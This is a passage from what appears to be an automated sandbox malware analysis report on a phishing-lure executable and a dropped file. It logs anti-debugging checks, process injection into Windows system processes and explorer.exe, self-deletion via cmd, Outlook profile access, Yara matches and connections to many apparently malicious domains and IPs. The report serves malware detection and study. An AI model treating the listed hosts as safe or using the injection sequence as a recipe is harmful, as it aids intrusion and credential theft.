          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044E61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044E61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044E35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_045805AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_045805AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_045369A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044E1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044E1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044E1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_0457EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_04544257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044B9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044B9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044B9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044B9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_0457AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_0457AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044C766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044F927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_0456B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_0456B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_04588A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044C8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044BC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044BC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044BC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044E8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044D3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044EA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044EA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044B5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044B5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044B5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044B5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044BAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044BAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_04571608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044F4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044F4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_0456FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044BE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044E36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044E2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044F8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_04588ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_0456FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044E2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044E16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044C76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_0454FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044ED294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044ED294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044B52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044B52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044B52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044B52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044B52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_045346A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044CAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044CAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_04580EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_04580EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_04580EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044EFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_04588B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044BDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044CEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044BF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044BDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044CFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_04588F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044E3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044E3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044EA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044EA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_0454FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_0454FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_0457131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\systray.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\logagent.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\logagent.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04649540 NtReadFile,LdrInitializeThunk,

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Windows\explorer.exeFile created: 6ld01n28q8c.exe.14.drJump to dropped file
          Source: C:\Windows\explorer.exeDomain query: www.alert78.info
          Source: C:\Windows\explorer.exeDomain query: www.bestpleasure4u.com
          Source: C:\Windows\explorer.exeDomain query: www.pkem.top
          Source: C:\Windows\explorer.exeDomain query: www.awp.email
          Source: C:\Windows\explorer.exeDomain query: www.librairie-adrienne.com
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exeDomain query: www.alifdanismanlik.com
          Source: C:\Windows\explorer.exeDomain query: www.bendyourtongue.com
          Source: C:\Windows\explorer.exeNetwork Connect: 162.0.232.169 80
          Source: C:\Windows\explorer.exeNetwork Connect: 154.90.64.134 80
          Source: C:\Windows\explorer.exeDomain query: www.handejqr.com
          Source: C:\Windows\explorer.exeDomain query: www.protection-onepa.com
          Source: C:\Windows\explorer.exeDomain query: www.fabio.tools
          Source: C:\Windows\explorer.exeNetwork Connect: 34.90.73.145 80
          Source: C:\Windows\explorer.exeNetwork Connect: 157.90.247.57 80
          Source: C:\Windows\explorer.exeDomain query: www.rematedeldia.com
          Source: C:\Windows\explorer.exeDomain query: www.cielotherepy.com
          Source: C:\Windows\explorer.exeDomain query: www.byausorsm26-plala.xyz
          Source: C:\Windows\explorer.exeNetwork Connect: 206.188.193.90 80
          Source: C:\Windows\explorer.exeDomain query: www.the-pumps.com
          Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.217 80
          Source: C:\Windows\explorer.exeDomain query: www.20dzwww.com
          Source: C:\Windows\explorer.exeDomain query: www.game2plays.com
          Source: C:\Windows\explorer.exeDomain query: www.kreativevisibility.net
          Source: C:\Windows\explorer.exeNetwork Connect: 162.0.214.189 80
          Source: C:\Windows\explorer.exeDomain query: www.t1uba.com
          Source: C:\Windows\explorer.exeNetwork Connect: 52.89.53.122 80
          Source: C:\Windows\explorer.exeNetwork Connect: 192.0.78.240 80
          Source: C:\Windows\explorer.exeDomain query: www.bubu3cin.com
          Source: C:\Windows\explorer.exeNetwork Connect: 119.28.141.142 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeDomain query: www.anniebapartments.com
          Source: C:\Windows\explorer.exeNetwork Connect: 172.120.156.91 80
          Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.215 80
          Source: C:\Windows\SysWOW64\DpiScaling.exeSection unmapped: C:\Windows\SysWOW64\systray.exe base address: 20000
          Source: C:\Windows\SysWOW64\DpiScaling.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\DpiScaling.exeSection loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\DpiScaling.exeSection loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\systray.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\systray.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeMemory written: C:\Windows\SysWOW64\DpiScaling.exe base: 72480000
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeMemory written: C:\Windows\SysWOW64\DpiScaling.exe base: 480000
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeMemory written: C:\Windows\SysWOW64\DpiScaling.exe base: 490000
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 72480000
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 760000
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 770000
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 72480000
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: AF0000
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: B00000
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeMemory allocated: C:\Windows\SysWOW64\DpiScaling.exe base: 72480000 protect: page execute and read and write
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeMemory allocated: C:\Windows\SysWOW64\DpiScaling.exe base: 480000 protect: page execute and read and write
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeMemory allocated: C:\Windows\SysWOW64\DpiScaling.exe base: 490000 protect: page execute and read and write
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeMemory allocated: C:\Windows\SysWOW64\logagent.exe base: 72480000 protect: page execute and read and write
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeMemory allocated: C:\Windows\SysWOW64\logagent.exe base: 760000 protect: page execute and read and write
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeMemory allocated: C:\Windows\SysWOW64\logagent.exe base: 770000 protect: page execute and read and write
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeMemory allocated: C:\Windows\SysWOW64\logagent.exe base: 72480000 protect: page execute and read and write
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeMemory allocated: C:\Windows\SysWOW64\logagent.exe base: AF0000 protect: page execute and read and write
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeMemory allocated: C:\Windows\SysWOW64\logagent.exe base: B00000 protect: page execute and read and write
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeMemory written: C:\Windows\SysWOW64\DpiScaling.exe base: 72480000 value starts with: 4D5A
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 72480000 value starts with: 4D5A
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 72480000 value starts with: 4D5A
          Source: C:\Windows\SysWOW64\DpiScaling.exeThread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Windows\SysWOW64\DpiScaling.exeThread register set: target process: 3352
          Source: C:\Windows\SysWOW64\systray.exeThread register set: target process: 3352
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeThread created: C:\Windows\SysWOW64\DpiScaling.exe EIP: 490000
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeThread created: C:\Windows\SysWOW64\logagent.exe EIP: 770000
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeThread created: C:\Windows\SysWOW64\logagent.exe EIP: B00000
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeProcess created: C:\Windows\SysWOW64\DpiScaling.exe C:\Windows\System32\DpiScaling.exe
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeProcess created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeProcess created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe
          Source: C:\Windows\SysWOW64\systray.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\DpiScaling.exe"
          Source: explorer.exe, 0000000E.00000000.366611598.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.347693062.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.468014235.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.388499876.0000000000B68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman\Pr
          Source: explorer.exe, 0000000E.00000000.469737729.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.347973710.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.389203545.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.366957090.00000000011E0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 0000000E.00000000.404286705.0000000005E10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.469737729.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.347973710.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.389203545.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.371531129.0000000005E10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.350568015.0000000005E10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.366957090.00000000011E0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000E.00000000.469737729.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.347973710.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.389203545.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.366957090.00000000011E0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 0000000E.00000000.469737729.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.347973710.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.389203545.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.366957090.00000000011E0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 0000000E.00000000.375239954.0000000008778000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.410877237.0000000008778000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.357539802.0000000008778000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWndh
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 13.0.DpiScaling.exe.72480000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 22.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 25.0.logagent.exe.72480000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 22.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 25.2.logagent.exe.72480000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.0.DpiScaling.exe.72480000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.0.DpiScaling.exe.72480000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.0.DpiScaling.exe.72480000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.0.DpiScaling.exe.72480000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.2.DpiScaling.exe.72480000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 22.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 25.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 25.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.0.DpiScaling.exe.72480000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 22.2.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 22.2.logagent.exe.72480000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 25.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.0.DpiScaling.exe.72480000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 22.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 25.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 22.0.logagent.exe.72480000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 22.0.logagent.exe.72480000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 25.0.logagent.exe.72480000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 22.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 22.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.0.DpiScaling.exe.72480000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 25.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 25.2.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 25.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.2.DpiScaling.exe.72480000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000D.00000000.341556441.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000000.342249677.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.444169115.0000000000D00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000000.460806286.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.443254780.0000000000620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000000.341156257.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000000.443394181.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000002.482010889.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.458795604.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000000.380170641.000000001033D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000000.341917837.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000000.443995537.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000000.442522254.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000000.418077999.000000001033D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000000.460438010.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000000.461529768.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000002.480269779.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000000.442878900.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.811786868.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.809884438.00000000000B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.811264852.0000000002C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000000.461169026.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\systray.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 13.0.DpiScaling.exe.72480000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 22.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 25.0.logagent.exe.72480000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 22.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 25.2.logagent.exe.72480000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.0.DpiScaling.exe.72480000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.0.DpiScaling.exe.72480000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.0.DpiScaling.exe.72480000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.0.DpiScaling.exe.72480000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.2.DpiScaling.exe.72480000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 22.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 25.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 25.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.0.DpiScaling.exe.72480000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 22.2.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 22.2.logagent.exe.72480000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 25.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.0.DpiScaling.exe.72480000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 22.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 25.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 22.0.logagent.exe.72480000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 22.0.logagent.exe.72480000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 25.0.logagent.exe.72480000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 22.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 22.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.0.DpiScaling.exe.72480000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 25.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 25.2.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 25.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.2.DpiScaling.exe.72480000.3.raw.unpack, type: UNPACKEDPE
